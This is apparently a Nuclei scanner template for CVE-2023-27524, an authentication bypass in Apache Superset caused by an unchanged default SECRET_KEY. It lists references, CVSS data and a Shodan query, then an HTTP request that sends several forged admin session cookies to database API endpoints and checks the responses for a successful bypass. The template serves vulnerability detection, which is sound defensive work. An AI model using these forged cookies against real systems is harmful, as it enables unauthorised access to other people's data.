id: CVE-2023-27524 info: name: Apache Superset - Authentication Bypass author: DhiyaneshDK,_0xf4n9x_ severity: critical description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Superset. reference: - https://github.com/horizon3ai/CVE-2023-27524 - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-27524 - http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html - http://www.openwall.com/lists/oss-security/2023/04/24/2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 epss-score: 0.91294 epss-percentile: 0.98557 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true max-request: 45 vendor: apache product: superset shodan-query: html:"Apache Superset" tags: packetstorm,cve,cve2023,apache,superset,auth-bypass http: - raw: - | GET /api/v1/database/{{path}} HTTP/1.1 Host: {{Hostname}} Cookie: session={{session}} payloads: path: - '1' - '2' - '3' - '4' - '5' - '6' - '7' - '9' - '10' session: - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY' - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U' attack: clusterbomb stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"database_name":' - '"configuration_method":' condition: and - type: status status: - 200 # digest: 4a0a0047304502210087a3b1dc02eb35b0317e67d56922745de6369ab172da6809eca4a9803af39f1d02206b88a38413ec1b36b06c3d3513a4646b3c49e345a833fab773dbbcff62dfe65e:922c64590222798bb761d5b6d8e72950